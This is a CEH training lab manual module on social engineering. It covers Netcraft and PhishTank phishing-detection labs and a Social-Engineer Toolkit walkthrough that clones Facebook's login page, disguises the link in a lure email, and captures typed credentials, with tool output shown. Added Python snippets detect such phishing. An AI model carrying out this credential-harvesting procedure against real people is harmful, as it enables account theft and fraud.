CEH v8 Lab Manual

Social Engineering

Module 09


Module 09 - Social Engineering

Social Engineering

Social engineering is the art of convincing people to reveal confidential information.

Lab Scenario

Source: http://money.cnn.com/2012/08/07/technology/walmart-hack-defcon/index.htm

Social engineering is essentially the art of gaining access to buildings, systems, or data by exploiting human psychology, rather than by breaking in or using technical hacking techniques. The term “social engineering” can also mean an attempt to gain access to information, primarily through misrepresentation, and often relies on the trusting nature of most individuals. For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.

Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving him information that could be used in a hacker attack to win a coveted “black badge” in the “social engineering” contest at the Defcon hackers’ conference in Las Vegas.

In this year's Capture the Flag social engineering contest at Defcon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and his talent for self-effacing small talk to squeeze the following information out of Wal-Mart:

■ The small-town Canadian Wal-Mart store's janitorial contractor

■ Its cafeteria food-services provider

■ Its employee pay cycle

■ Its staff shift schedule

■ The time managers take their breaks

■ Where they usually go for lunch

■ Type of PC used by the manager

■ Make and version numbers of the computer's operating system, and

■ Its web browser and antivirus software

Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken in to the extent of coughing up so much scam-worthy treasure.

Calling from his sound-proofed booth at Defcon, MacDougall placed an “urgent” call, broadcast to the entire Defcon audience, to a Wal-Mart store manager in Canada, introducing himself as "Gary Darnell" from Wal-Mart's home office in Bentonville, Ark.


Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

CEH Lab Manual Page 675


The role-playing visher (vishing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility of winning a multimillion-dollar government contract.

“Darnell” said that his job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations.

But first, he told the store manager, he needed a thorough picture of how the store operated.

In the conversation, which lasted about 10 minutes, “Darnell” described himself as a newly hired manager of government logistics.

He also spoke offhand about the contract: “All I know is Wal-Mart can make a ton of cash off it,” he said, then went on to talk about his upcoming visit, keeping up a “steady patter” about the project and life in Bentonville, Cowley writes.

As if this wasn't bad enough, MacDougall/Darnell directed the manager to an external site to fill out a survey in preparation for his upcoming visit.

The compliant manager obliged, plugging the address into 111s browser.

When his computer blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT department and get the site unlocked.

After ending the call, stepping out of the booth and accepting his well-earned applause, MacDougall became the first Capture the Flag champion to capture every data point, or flag, on the competition checklist in the three years it has been held at Defcon. Defcon gives contestants two weeks to research their targets. Touchy information such as social security numbers and credit card numbers is verboten, given that Defcon has no great desire to bring the law down on its head.

Defcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the Defcon audience to have listened as MacDougall pulled down Wal-Mart's pants.

MacDougall said, “Companies are way more aware about their security. They’ve got firewalls, intrusion detection, log-in systems going into place, so it’s a lot harder for a hacker to break in these days, or to at least break in undetected. So a bunch of hackers now are going to the weakest link, and the link that companies just aren’t protecting, which is the people.”

MacDougall also shared a few best practices to be followed to avoid falling victim to a social engineer:

■ Never be afraid to say no. If something feels wrong, something is wrong

■ An IT department should never be calling asking about operating systems, machines, passwords or email systems—they already know


■ Set up an internal company security word of the day and don’t give any information to anyone who doesn’t know it

■ Keep tabs on what’s on the web. Companies inadvertently release tons of information online, including through employees’ social media sites

As an expert ethical hacker and penetration tester, you should circulate the best practices to be followed among the employees.

Lab Objectives

The objective of this lab is to:

■ Detect phishing sites

■ Protect the network from phishing attacks

To carry out this lab, you need:

■ A computer running Windows Server 2012

■ A web browser with Internet access

Lab Duration

Time: 20 Minutes

Overview of Social Engineering

Social engineering is the art of convincing people to reveal confidential information. Social engineers depend on the fact that people are aware of certain valuable information and are careless in protecting it.

Lab Tasks

Recommended labs to assist you in social engineering:

■ Social engineering

■ Detecting phishing using Netcraft

■ Detecting phishing using PhishTank

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target’s security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

TASK 1: Overview


Detecting Phishing Using Netcraft

Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

Lab Scenario

By now you are familiar with how social engineering is performed and what sort of information can be gathered by a social engineer.

Phishing is an example of a social engineering technique used to deceive users, and it exploits the poor usability of current web security technologies.

Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one.

Phishers are targeting the customers of banks and online payment services. They send messages to the bank customers by manipulating URLs and website forgery. The messages sent claim to be from a bank and they look legitimate; users, not realizing that it is a fake website, provide their personal information and bank details. Not all phishing attacks require a fake website; messages that claim to be from a bank tell users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) is dialed, it prompts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.

Since you are an expert ethical hacker and penetration tester, you must be aware of phishing attacks occurring on the network and implement anti-phishing measures. In an organization, proper training must be provided to people to deal with phishing attacks. In this lab you will learn to detect phishing using Netcraft.


Lab Objectives

This lab will show you how to identify phishing sites using a web browser and how to use the detection tools. It will teach you how to:

■ Detect phishing sites

■ Protect the network from phishing attack

To carry out this lab you need:

■ Netcraft is located at D:\CEH-Tools\CEHv8 Module 09 Social Engineering\Anti-Phishing Toolbar\Netcraft Toolbar

■ You can also download the latest version of Netcraft Toolbar from the link http://toolbar.netcraft.com/

■ If you decide to download the latest version, then screenshots shown in the lab might differ

■ A computer running Windows Server 2012

■ A web browser (Firefox, Internet Explorer, etc.) with Internet access

■ Administrative privileges to run the Netcraft toolbar

Lab Duration

Time: 10 Minutes

Overview of Netcraft Toolbar

Netcraft Toolbar provides Internet security services, including anti-fraud and anti-phishing services, application testing, code reviews, automated penetration testing, and research data and analysis on many aspects of the Internet.

Lab Tasks

1. To start this lab, you need to launch a web browser first. In this lab we have used Mozilla Firefox.

2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

TASK 1: Anti-Phishing Toolbar

FIGURE 1.1: Windows Server 2012 Start Menu

You can also download the Netcraft toolbar from http://toolbar.netcraft.com

3. Click the Mozilla Firefox app to launch the browser.

FIGURE 1.2: Windows Server 2012 Start Menu Apps view

4. To download the Netcraft Toolbar for Mozilla Firefox, enter http://toolbar.netcraft.com in the address bar of the browser, or drag and drop the netcraft_toolbar-1.7-fx.xpi file into Firefox.

5. In this lab, we are downloading the toolbar from the Internet.

6. In the Firefox browser, click Download the Netcraft Toolbar to install it as an add-on.

FIGURE 1.3: Netcraft toolbar download page

Netcraft provides Internet security services, including anti-fraud and anti-phishing services.


7. On the Install page of the Netcraft Toolbar site, click the Firefox image to continue with the installation.

FIGURE 1.4: Netcraft toolbar installation page

8. Click Allow to download the Netcraft Toolbar.

FIGURE 1.5: Netcraft toolbar installation, Allow button

9. When the Software Installation dialog box appears, click Install Now.

Software Installation

Install add-ons only from authors whom you trust.

Malicious software can damage your computer or violate your privacy.

You have asked to install the following item:

Netcraft Anti-Phishing Toolbar (Netcraft Ltd) http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi

Install Now Cancel

F IG U R E 1.6: Installing Netcraft Toolbar

10. To complete the installation it will ask you to restart the browser. Click Restart Now.

Netcraft is an Internet services company based in Bath, England.

Netcraft Toolbar provides a wealth of information about the sites you visit.

FIGURE 1.7: Restarting Firefox browser

11. Netcraft Toolbar is now visible. Once the Toolbar is installed, it looks similar to the following figure.

FIGURE 1.8: Netcraft Toolbar on Mozilla Firefox web browser

12. When you visit a site, the following information displays in the Toolbar (unless the page has been blocked): Risk Rating, Rank, and Flag.

13. Click Site Report to show the report of the site.

F IG U R E 1.9: Report generated by Netcraft Toolbar

14. If you attempt to visit a page that has been identified as a phishing page by Netcraft Toolbar, you will see a warning dialog that looks similar to the one in the following figure.

15. Type, as an example: http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin

Risk Rating displays the trustworthiness of the current site. Site Report links to a detailed report for the site.


F IG U R E 1.10: Warning dialog for blocked site

16. If you trust that page, click Yes to open it; if you don’t, click No (Recommended) to block that page.

17. If you click N o the following page will be displayed.

Phishing site feeds: a continuously updated, encrypted database of patterns that match phishing URLs reported by the Netcraft Toolbar.

FIGURE 1.11: Web page blocked by Netcraft Toolbar

Lab Analysis

Document all the results and reports gathered during the lab.

Tool/Utility: Netcraft

Information Collected/Objectives Achieved: Phishing site detected

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Evaluate whether the Netcraft Toolbar works if you use a transparent proxy.


2. Determine if you can make the Netcraft Toolbar coexist on the same line as other toolbars. If so, how?

3. How can you stop the Toolbar warning if a site is trusted?

Internet Connection Required: Yes

Platform Supported: Classroom


Detecting Phishing Using PhishTank

PhishTank is a collaborative clearinghouse for data and information regarding phishing on the Internet.

Lab Scenario

Phishing is an attempt by an individual or group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they have been sent from a legitimate organization or known individual. These emails often attempt to entice users to click on a link that will take the user to a fraudulent website that appears legitimate. The user then may be asked to provide personal information such as account user names and passwords that can further expose them to future compromises. Additionally, these fraudulent websites may contain malicious code.

With the tremendous increase in the use of online banking, online share trading, and ecommerce, there has been a corresponding growth in the incidents of phishing being used to carry out financial fraud. Phishing involves fraudulently acquiring sensitive information (e.g., passwords, credit card details, etc.) by masquerading as a trusted entity.

In the previous lab you have already seen how a phishing site can be detected using the Netcraft tool.

The usual scenario is that the victim receives an email that appears to have been sent from his bank. The email urges the victim to click on the link in the email. When the victim does so, he is taken to “a secure page on the bank’s website.” The victim believes the web page to be authentic and he enters his user name, password, and other information. In reality, the website is a fake and the victim’s information is stolen and misused.

Being an administrator or penetration tester, you might implement all the most sophisticated and expensive technology solutions in the world; all of it can be bypassed if your employees fall for simple social engineering scams. It becomes your responsibility to educate employees on best practices for protecting information.

Phishing sites or emails can be reported to [email protected]

http://www.us-cert.gov/nav/report_phishing.html

US-CERT (United States Computer Emergency Readiness Team) is collecting phishing email messages and website locations so that they can help people avoid becoming victims of phishing scams.

Lab Objectives

This lab will show you how to check suspected phishing sites using a web browser. It will teach you how to:

■ Detect phishing sites

■ Protect the network from phishing attacks

Lab Environment

To carry out the lab you need:

■ A computer running Windows Server 2012

■ A web browser (Firefox, Internet Explorer, etc.) with Internet access

Lab Duration

Time: 10 Minutes

Overview of PhishTank

PhishTank URL: http://www.phishtank.com

PhishTank is a free community site where anyone can submit, verify, track, and share phishing data. PhishTank is a collaborative clearing house for data and information regarding phishing on the Internet. Also, PhishTank provides an open API for developers and researchers to integrate anti-phishing data into their applications at no charge.

Lab Tasks

1. To start this lab you need to launch a web browser first. In this lab we have used Mozilla Firefox.

2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

TASK 1: PhishTank

FIGURE 2.1: Windows Server 2012 Start Menu

3. Click the Mozilla Firefox app to launch the browser.

FIGURE 2.2: Windows Server 2012 Start Menu Apps view

4. Type http://www.phishtank.com in the address bar of the web browser and press Enter.

5. You will see the following:

FIGURE 2.3: Welcome screen of PhishTank


6. Type the website URL to be checked for phishing, for example, http://sdapld21.host21.com.

7. Click Is it a phish?.

PhishTank is operated by OpenDNS to improve the Internet through safer, faster, and smarter DNS.

FIGURE 2.4: Checking for site

If the site is a phishing site, you see the following warning dialog box.

FIGURE 2.5: Warning dialog for phishing site (Submission #1571567 is currently ONLINE; sign in or register to verify this submission; no screenshot yet)
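A heuristic triage of the two URLs checked in the Netcraft and PhishTank labs, as an added example that is not part of the manual and not Netcraft or PhishTank code: it splits a hostname into its registered domain and subdomain labels and flags the "brand name planted in a subdomain of an unrelated registered domain" pattern that www.paypal.ca.6551.secure7c.mx shows. BRANDS and PUBLIC_SUFFIXES are small constructed lists standing in for the Public Suffix List and a curated brand set.

```python
"""Heuristic triage of the lab's suspected phishing URLs.

Added example for this lab manual; not code from EC-Council, Netcraft
or PhishTank. BRANDS and PUBLIC_SUFFIXES are constructed stand-ins; a
real deployment would load the Public Suffix List and a curated brand set.
"""
from urllib.parse import urlsplit

# Constructed: suffixes under which third parties register names.
PUBLIC_SUFFIXES = {"com", "net", "org", "mx", "ca", "com.mx", "co.uk"}
# Constructed: brand names a phisher may plant in a hostname label.
BRANDS = {"paypal", "walmart", "ebay"}
# Findings that on their own justify a warning or block.
STRONG = ("brand_in_subdomain", "suffix_as_label")


def split_host(host):
    """Split a hostname into (registrable domain, list of subdomain labels).

    The longest matching public suffix wins, so 'www.paypal.com.mx' yields
    'paypal.com.mx' rather than treating 'mx' alone as the suffix.
    """
    labels = host.lower().rstrip(".").split(".")
    for n in range(len(labels) - 1, 0, -1):
        if ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):]), labels[:-(n + 1)]
    return ".".join(labels), []


def triage(url):
    """Return the registrable domain, heuristic findings and a verdict."""
    parts = urlsplit(url)
    if not parts.hostname:
        raise ValueError("no hostname in %r" % url)
    reg, sub = split_host(parts.hostname)
    owner = reg.split(".")[0]  # first label of the registered name
    findings = []
    for brand in sorted(BRANDS):
        # Brand inside a subdomain label while the registered name is not
        # the brand's own: the www.paypal.ca.6551.secure7c.mx pattern.
        if owner != brand and any(brand in lbl for lbl in sub):
            findings.append("brand_in_subdomain:" + brand)
    for lbl in sub:
        # A public suffix used as an ordinary label ('ca', 'com') imitates
        # the end of a real domain name in the middle of a fake one.
        if lbl in PUBLIC_SUFFIXES:
            findings.append("suffix_as_label:" + lbl)
    if any(lbl.isdigit() for lbl in sub):
        findings.append("numeric_label")
    if parts.scheme == "http":
        findings.append("plain_http")
    if any(f.split(":")[0] in STRONG for f in findings):
        verdict = "suspicious"
    else:
        verdict = "no strong indicator; consult a reputation feed"
    return {"registrable_domain": reg, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for u in ("http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin",
              "http://sdapld21.host21.com",
              "https://www.paypal.com.mx/signin"):
        print(u, triage(u))
```

The host21.com URL from the PhishTank lab yields no strong indicator, which is why these heuristics are paired with a reputation feed such as the Netcraft toolbar or PhishTank rather than used alone.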

Lab Analysis

Document all the websites and verify whether they are phishing sites.

OpenDNS is interested in having the best available information about phishing websites.

Tool/Utility: PhishTank

Information Collected/Objectives Achieved: Phishing site detected


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Evaluate what PhishTank wants to hear about spam.

2. Does PhishTank protect you from phishing?

3. Why is OpenDNS blocking a phish site that PhishTank doesn't list or has not yet verified?

Internet Connection Required: Yes

Platform Supported: Classroom


Social Engineering Penetration Testing Using Social Engineering Toolkit (SET)

The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering.

Lab Scenario

Social engineering is an ever-growing threat to organizations all over the world. Social engineering attacks are used to compromise companies every day. Even though there are many hacking tools available within underground hacking communities, a social engineering toolkit is a boon for attackers as it is freely available to use to perform spear-phishing attacks, website attacks, etc. Attackers can draft email messages, attach malicious files, and send them to a large number of people using the spear-phishing attack method. Also, the multi-attack method allows utilization of the Java applet, Metasploit browser, Credential Harvester/Tabnabbing, etc. all at once.

Though numerous sorts of attacks can be performed using this toolkit, it is also a must-have tool for a penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and is supported heavily within the security community.

As an ethical hacker, penetration tester, or security administrator, you should be extremely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities on the network.

Lab Objectives

The objective of this lab is to help students learn to:

■ Clone a website

■ Obtain user names and passwords using the Credential Harvester method

■ Generate reports for conducted penetration tests


Lab Environment

To carry out the lab, you need:

■ Run this tool in the BackTrack virtual machine

■ Web browser with Internet access

■ Administrative privileges to run tools

Lab Duration

Time: 10 Minutes

Overview of Social Engineering Toolkit

The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering. SET is specifically designed to perform advanced attacks against the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

Lab Tasks

1. Log in to your BackTrack virtual machine.

2. Select Applications -> BackTrack -> Exploitation Tools -> Social Engineering Tools -> Social Engineering Toolkit and click set.

TASK 1: Execute Social Engineering Toolkit

FIGURE 3.1: Launching SET in BackTrack

3. A Terminal window for SET will appear. Type y and press Enter to agree to the terms of service.

FIGURE 3.2: SET service agreement prompt (the terminal shows the BSD-derived license text and asks you to accept the terms of service; by typing yes, one time only, you agree to use the tool for lawful purposes only)

4. You will be presented with a list of menus to select the task. Type 1 and press Enter to select the Social-Engineering Attacks option.

Homepage: https://www.trustedsec.com

Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

Select from the menu:

 1) Social-Engineering Attacks
 2) Fast-Track Penetration Testing
 3) Third Party Modules
 4) Update the Metasploit Framework
 5) Update the Social-Engineer Toolkit
 6) Update SET configuration
 7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

FIGURE 3.3: SET Main menu

5. A list of menus in Social-Engineering Attacks will appear; type 2 and press Enter to select Website Attack Vectors.

SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon.

The web jacking attack is performed by replacing the victim's browser with another window that is made to look and appear to be a legitimate site.

SET allows you to specially craft email messages and send them to a large (or small) number of people with attached file format malicious payloads.

Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

CEH Lab Manual Page 692


Module 09 - Social Engineering

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate

99) Return to Main Menu

set:webattack>

FIGURE 3.4: Social Engineering Attacks menu

6. In the next set of menus that appears, type 3 and press Enter to select the Credential Harvester Attack Method.

[...] and the BackTrack team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

FIGURE 3.5: Website Attack Vectors menu

7. Now, type 2 and press Enter to select the Site Cloner option from the menu.

The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.


9) Create or import a CodeSigning Certificate

99) Return to Main Menu

set:webattack>3

The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack>

The Site Cloner is used to clone a website of your choice.

FIGURE 3.6: Credential Harvester Attack menu

8. Type the IP address of your BackTrack virtual PC in the prompt for IP address for the POST back in Harvester/Tabnabbing and press Enter. In this example, the IP is 10.0.0.15.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15

FIGURE 3.7: Providing IP address in Harvester/Tabnabbing

9. Now, you will be prompted for a URL to be cloned; type the desired URL at Enter the url to clone and press Enter. In this example, we have used www.facebook.com. This will initiate the cloning of the specified website.

The tabnabbing attack method is used when a victim has multiple tabs open; when the user clicks the link, the victim will be presented with a "Please wait while the page loads". When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are inserted, they are harvested and the user is redirected back to the original website.


set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.facebook.com

FIGURE 3.8: Providing URL to be cloned

10. After cloning is completed, the highlighted message, as shown in the following screenshot, will appear on the Terminal screen of SET. Press Enter to continue.

11. SET will start the Credential Harvester.

set:webattack> Enter the url to clone:www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

Press <return> to continue

FIGURE 3.9: SET Website Cloning

12. Leave the Credential Harvester Attack running to fetch information from the victim's machine.

The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.

If you're doing a penetration test, register a name that's similar to the victim, for Gmail you could do gmai1.com (notice the 1), something similar that can mistake the user into thinking it's the legitimate


[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

Press <return> to continue
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

FIGURE 3.10: SET Credential Harvester Attack

13. Now, you have to send the IP address of your BackTrack machine to a victim and trick him or her into clicking to browse to the IP address.

14. For this demo, launch your web browser in the BackTrack machine and open your favorite email service. In this example we have used www.gmail.com. Log in to your Gmail account and compose an email.

FIGURE 3.11: Composing email in Gmail

15. Place the cursor in the body of the email where you wish to place the fake URL. Then, click the Link icon.

When you hover over the link, the URL will be presented with the real URL, not the attacker's machine. So for example if you're cloning gmail.com, the URL when hovered over it would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious Webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.

Most of the time they won't even notice the IP but it's just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in the fields, you will notice that we can intercept the credentials now.


[Screenshot: Gmail Compose Mail window in Mozilla Firefox on BackTrack. To: [recipient address]; Subject: TGIF - Party Pictures; body: "Hello Sam, Please click this link to view the weekend party pictures at TGIF with the celebrities. Regards."]

FIGURE 3.12: Linking Fake URL to Actual URL

16. In the Edit Link window, first type the actual address in the Web address field under the Link to option and then type the fake URL in the Text to display field. In this example, the web address we have used is http://10.0.0.15 and the text to display is www.facebook.com/Rini TGIF. Click OK.

[Screenshot: Gmail Edit Link window. Text to display: www.facebook.com/Rini TGIF; Link to: Web address; To what URL should this link go? http://10.0.0.15; OK / Cancel.]

FIGURE 3.13: Edit Link window

17. The fake URL should appear in the email body, as shown in the following screenshot.


[Screenshot: Gmail Compose Mail window. Subject: TGIF - Party Pictures; body: "Hello Sam, Please click this link www.facebook.com/Rini TGIF to view the party pictures at TGIF with the celebrities. Regards."]

FIGURE 3.14: Adding Fake URL in the email content

18. To verify that the fake URL is linked to the actual URL, click the fake URL and it will display the actual URL as Go to link: followed by the actual URL. Send the email to the intended user.

[Screenshot: Gmail Compose Mail window. Body: "Please click this link www.facebook.com/Rini TGIF to view the weekend party pictures at TGIF with the celebrities. Regards." Clicking the link shows: Go to link: http://10.0.0.15 - Change - Remove.]

FIGURE 3.15: Actual URL linked to Fake URL
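A defender-side check for the deception this procedure relies on, added here as an example that is not part of the manual or of SET: it parses an HTML email body or a captured page and flags a link whose visible text names one host while the href points elsewhere (the step 16 trick), and a password form that submits to a bare IP over plain HTTP (the cloned page of Figure 3.16). The sample HTML, the 10.0.0.15 address and the function names are constructed for this example.

```python
"""Added example for this lab (not from the CEH manual or from SET): flag the
two artefacts the attack leaves behind -- a link whose visible text names a
legitimate site while its href points at the attacker's machine, and a cloned
login form that POSTs a password to a bare IP over plain HTTP. Samples below
are constructed to mirror the lab's email and cloned page."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A hostname inside visible link text, e.g. "www.facebook.com/Rini TGIF".
TEXT_HOST_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)

def host_of(url):
    """Hostname of a URL; a scheme-less value like 'www.x.com/a' is read as http."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()

def strip_www(host):
    return host[4:] if host.startswith("www.") else host

def is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

class _Collector(HTMLParser):
    """Collects (href, visible text) per anchor and (action, has_password) per form."""

    def __init__(self):
        super().__init__()
        self.links, self.forms = [], []
        self._href, self._text, self._form = None, [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a":
            self._href, self._text = a.get("href", ""), []
        elif tag == "form":
            self._form = [a.get("action", ""), False]
        elif tag == "input" and self._form and a.get("type", "").lower() == "password":
            self._form[1] = True

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join(self._text).strip()))
            self._href = None
        elif tag == "form" and self._form is not None:
            self.forms.append(tuple(self._form))
            self._form = None

def audit_html(html):
    """Return (kind, detail) findings; an empty list means nothing suspicious."""
    p = _Collector()
    p.feed(html)
    findings = []
    for href, text in p.links:
        target = host_of(href)
        m = TEXT_HOST_RE.search(text)
        shown = m.group(1).lower() if m else ""
        if shown and strip_www(shown) != strip_www(target):  # display-text trick of step 16
            findings.append(("link_text_mismatch", f"text says {shown}, href goes to {target}"))
        if is_bare_ip(target):
            findings.append(("link_to_bare_ip", href))
    for action, has_password in p.forms:  # the harvester's clone POSTs to a bare IP over http
        if has_password and (is_bare_ip(host_of(action)) or urlparse(action).scheme == "http"):
            findings.append(("password_form_to_untrusted_endpoint", action))
    return findings

# Constructed samples: the lab's phishing email, its cloned login page, and a benign link.
SAMPLE_EMAIL = ('<p>Hello Sam, please click this link <a href="http://10.0.0.15">'
                'www.facebook.com/Rini TGIF</a> to view the party pictures.</p>')
SAMPLE_CLONE = ('<form action="http://10.0.0.15/login.php" method="post">'
                '<input type="text" name="email"><input type="password" name="pass"></form>')
SAMPLE_BENIGN = '<a href="https://www.facebook.com/">www.facebook.com</a>'
```

Run `audit_html(SAMPLE_EMAIL)` to see both link findings; the same check applied to the mail gateway or to the page a user landed on is what makes step 20's "replica of Facebook" visible before credentials are typed.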

19. When the victim clicks the URL, he or she will be presented with a replica of Facebook.com.

20. The victim will be enticed to enter his or her user name and password into the form fields as it appears to be a genuine website. When the victim enters the Username and Password and clicks Log In, it does not allow logging in; instead, it redirects to the legitimate Facebook login page. Observe the URL in the browser.

In some cases when you're performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an "untrusted" warning when a victim goes to your website


[Screenshot, top: the cloned Facebook Login page served from the BackTrack machine (Email or Phone, Password, Keep me logged in, Sign up for Facebook, Forgot your password?). Bottom: the legitimate page at https://www.facebook.com/login.php after the redirect, with Google Chrome asking "Do you want Google Chrome to save your password?"]

FIGURE 3.16: Fake and Legitimate Facebook login page

21. As soon as the victim types in the email address and password, the SET Terminal in BackTrack fetches the typed user name and password, which can be used by an attacker to gain unauthorized access to the victim's account.

The multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So when the user clicks the link he will be targeted by each of the attack vectors you specify. One thing to note with the attack vector is you can't utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack.

The multi attack vector utilizes each combination of attacks and allows the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage the attack vector. When you're finished be sure to select the 'I'm finished' option.


[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
10.0.0.2 - - [26/Sep/2012 11:10:41] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVqgmkGh
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,
PARAM: timezone=-330
PARAM: lgnrnd=224034_ArYA
POSSIBLE USERNAME FIELD FOUND: email=[unreadable in screenshot]
POSSIBLE PASSWORD FIELD FOUND: pass=[unreadable in screenshot]
